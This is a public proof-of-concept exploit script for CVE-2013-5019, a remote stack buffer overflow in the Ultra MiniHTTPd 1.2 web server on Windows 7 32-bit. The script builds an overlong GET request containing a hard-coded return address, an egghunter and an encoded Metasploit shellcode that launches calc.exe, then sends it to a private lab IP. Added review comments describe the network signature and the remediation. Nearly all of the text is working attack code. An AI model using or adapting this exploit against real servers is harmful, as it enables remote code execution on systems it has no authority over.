Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow (PoC)
# Exploit Title: Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow
# Date: 2018-04-14
# Exploit Author: jollymongrel
# Vendor Homepage: http://www.vector.co.jp
# Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html
# Version: 1.2
# Tested on: Windows 7 32-bit
# CVE : CVE-2013-5019
#
# NOTE(review): Python 2 script (print statement, str-based socket I/O; `sys`
# is imported but never used). It builds one fixed, over-long GET request line
# and sends it to a hard-coded private-range (RFC 1918) lab address; nothing is
# parameterized, and the single recv() result is never inspected.
# Defensive view: the on-the-wire observable is a request path of roughly 1 KB
# made mostly of repeated filler bytes, with no space before "HTTP/1.1"; a
# request-line length/format check flags it, and the actual remediation is to
# remove or upgrade the affected 1.2 server.

import sys
import socket
import struct

# 4-byte value placed at the return-address slot, packed with native ('I')
# byte order and size. It is tied to one specific msvcrt.dll load address on
# the tested Windows 7 32-bit build, so it is not portable across builds or
# ASLR-randomized loads.
eip = struct.pack('I', 0x764046cd) #call esp [msvcrt.dll]

#windows/exec - 274 bytes
#http://www.metasploit.com
#Encoder: x86/shikata_ga_nai
#EXITFUNC=thread
#CMD=calc.exe
#badchars='\x00\x09\x0a\x0b\x0c\x0d\x20\x2f\x3f'
# Author-supplied Metasploit payload (calc.exe, per the comments above),
# prefixed with the 8-byte egg marker "no0bno0b" that the egghunter below
# searches for.
shellcode = ("no0bno0b"+"\xb8\x21\xa0\xa2\xbd\xdb\xd1\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x3e\x31\x43\x15\x83\xc3\x04\x03\x43\x11\xe2\xd4\x1a\x51\xd8"
"\x25\xbd\x4c\xf4\x90\x35\x55\x0f\x79\x9f\x5c\x5e\x45\x5c\xb5"
"\x5d\x84\x31\x44\x9d\x46\xde\x89\xb2\x1a\x92\xe6\x1d\x26\x1d"
"\xa1\xb0\xfa\x6c\x5a\x1e\xf7\xb7\xb6\xfb\x71\xbf\x2a\x51\xb6"
"\x2a\x53\x27\x2a\x43\x49\x67\xe7\x66\x6a\x6e\xe3\x10\x46\x27"
"\xe5\x1f\xc5\xb5\xad\x32\x57\x38\xd3\x66\xa8\xa7\xf8\xe0\xfc"
"\x1a\x33\xce\x22\xf0\xad\x34\xff\x3a\x42\x91\x07\x6d\xe5\xf1"
"\x79\x73\xa3\xe9\xbf\xd7\xbf\xa7\x10\x06\xf2\x2c\x81\x6a\xa0"
"\x97\x46\xae\xe7\x33\x1c\x87\x02\x5d\x8d\xd7\x5a\xbe\x7c\xa9"
"\x96\x7f\x04\xbd\xe4\xb5\xbc\xa0\xf5\xf3\x12\x66\x6c\xbc\xb7"
"\xb2\x49\x01\x66\xd3\x8f\x40\x5b\x33\x07\x22\x30\x0e\x11\xc6"
"\x89\xfa\xbc\x18\x0f\x33\x18\xb1\x01\xe0\x53\x4a\x23\xab\x77"
"\x17\x7f\xf8\x4f\xdd\x01\x79\x04\xa6\x82\xe0\xc4\x33\x06\x12"
"\x36\x43\x2d\xc6\x8a\xfb\x24\x67\x4a\xc6\x5a\x4a\x4c\x97\x4c"
"\x1b\x68\x98\xf8\x45\x2d\x86\x43\xbe\x0e\x96\x8f\xca\x89\x7e"
"\x5b\xe1\x8b\xb2\x5f\xd0\x94\xdf\x5e\x7c\x0e\x25\xa5\xf7\xea"
"\x9d\x1b\xa9\x58\x50\x3a\xb8\x77\x16\xb1\x87\x48\x94\x37\x87"
"\x9a\x9d\xe2\xd0")

#egg hunter to search for no0bno0b
egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x6e\x6f\x30\x62\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

# Fixed payload layout as chosen by the author for the tested build:
# 537 bytes of "A" filler, egg marker + shellcode, "A" filler up to 967 bytes,
# eip, egghunter, the two-byte "\xff\xe7" stub, then "C" filler to 1007 bytes.
# All offsets are literal constants; nothing is computed from the target.
payload = "A" * 537
payload += shellcode
payload += "A" * (967 - len(payload))
payload += eip
payload += egghunter
payload += "\xff\xe7" #jmp edi
payload += "C" * (1007 - len(payload))

print "[+] sending payload, length", len(payload)

# Request line is "GET /" + payload + "HTTP/1.1": note there is no space before
# the version token, and the path is the ~1 KB of bytes assembled above.
buf = "GET /"+payload+"HTTP/1.1\r\n\r\n"

# One TCP connection to the hard-coded lab target (private 192.168.0.0/16
# range), one send, one recv whose result (`data`) is never inspected, so the
# script gives no indication of success or failure.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.32.175", 80))
s.send(buf)
data = s.recv(1024)
s.close()